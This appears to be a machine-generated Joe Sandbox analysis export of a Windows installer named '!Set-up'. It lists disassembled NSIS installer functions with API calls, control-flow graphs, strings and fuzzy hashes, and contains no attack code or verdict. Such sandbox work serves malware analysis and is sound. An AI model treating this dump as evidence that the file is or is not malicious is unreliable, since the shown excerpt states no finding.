                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CountFileTickWrite$wsprintf
                                                              • String ID: (]C$... %d%%$pAB$vyB$y9B
                                                              • API String ID: 651206458-2231457358
                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                              Control-flow Graph

                                                              control_flow_graph 713 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 716 403603-403608 713->716 717 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 713->717 718 4037e2-4037e6 716->718 725 403641 717->725 726 403728-403736 call 4032d2 717->726 728 403646-40365d 725->728 732 4037f1-4037f6 726->732 733 40373c-40373f 726->733 730 403661-403663 call 403336 728->730 731 40365f 728->731 737 403668-40366a 730->737 731->730 732->718 735 403741-403759 call 403368 call 403336 733->735 736 40376b-403795 GlobalAlloc call 403368 call 40337f 733->736 735->732 764 40375f-403765 735->764 736->732 762 403797-4037a8 736->762 740 403670-403677 737->740 741 4037e9-4037f0 call 4032d2 737->741 742 4036f3-4036f7 740->742 743 403679-40368d call 405e38 740->743 741->732 749 403701-403707 742->749 750 4036f9-403700 call 4032d2 742->750 743->749 760 40368f-403696 743->760 753 403716-403720 749->753 754 403709-403713 call 4072ad 749->754 750->749 753->728 761 403726 753->761 754->753 760->749 766 403698-40369f 760->766 761->726 767 4037b0-4037b3 762->767 768 4037aa 762->768 764->732 764->736 766->749 769 4036a1-4036a8 766->769 770 4037b6-4037be 767->770 768->767 769->749 771 4036aa-4036b1 769->771 770->770 772 4037c0-4037db SetFilePointer call 405e38 770->772 771->749 773 4036b3-4036d3 771->773 776 4037e0 772->776 773->732 775 4036d9-4036dd 773->775 777 4036e5-4036ed 775->777 778 4036df-4036e3 775->778 776->718 777->749 779 4036ef-4036f1 777->779 778->761 778->777 779->749
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                              Strings
                                                              • soft, xrefs: 004036A1
                                                              • Null, xrefs: 004036AA
                                                              • Error launching installer, xrefs: 00403603
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                              • Inst, xrefs: 00403698
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 4283519449-527102705
                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                              Control-flow Graph

                                                              control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                              APIs
                                                              • lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                              • lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2740478559-0
                                                              • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                              • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                              Control-flow Graph

                                                              control_flow_graph 795 401eb9-401ec4 796 401f24-401f26 795->796 797 401ec6-401ec9 795->797 798 401f53-401f7b GlobalAlloc call 406831 796->798 799 401f28-401f2a 796->799 800 401ed5-401ee3 call 4062cf 797->800 801 401ecb-401ecf 797->801 816 4030e3-4030f2 798->816 817 402387-40238d GlobalFree 798->817 802 401f3c-401f4e call 406035 799->802 803 401f2c-401f36 call 4062cf 799->803 813 401ee4-402702 call 406831 800->813 801->797 804 401ed1-401ed3 801->804 802->817 803->802 804->800 808 401ef7-402e50 call 406035 * 3 804->808 808->816 828 402708-40270e 813->828 817->816 828->816
                                                              APIs
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GlobalFree.KERNELBASE(00863740), ref: 00402387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FreeGloballstrcpyn
                                                              • String ID: %IsraeliSales%$Exch: stack < %d elements$Pop: stack empty
                                                              • API String ID: 1459762280-1719584793
                                                              • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                              • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                              Control-flow Graph (graph image not captured in this export)
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                              • GlobalFree.KERNELBASE(00863740), ref: 00402387
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                              • String ID:
                                                              • API String ID: 3376005127-0
                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                              Control-flow Graph (graph image not captured in this export)
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                              • String ID:
                                                              • API String ID: 2568930968-0
                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                              Control-flow Graph (graph image not captured in this export)
                                                              APIs
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                              • String ID: %IsraeliSales%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                              • API String ID: 247603264-4002239702
                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                              Control-flow Graph (graph image not captured in this export)
                                                              APIs
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                              • API String ID: 3156913733-2180253247
                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: nsa
                                                              • API String ID: 1716503409-2209301699
                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                              • String ID: HideWindow
                                                              • API String ID: 1249568736-780306582
                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                              Memory Dump Source
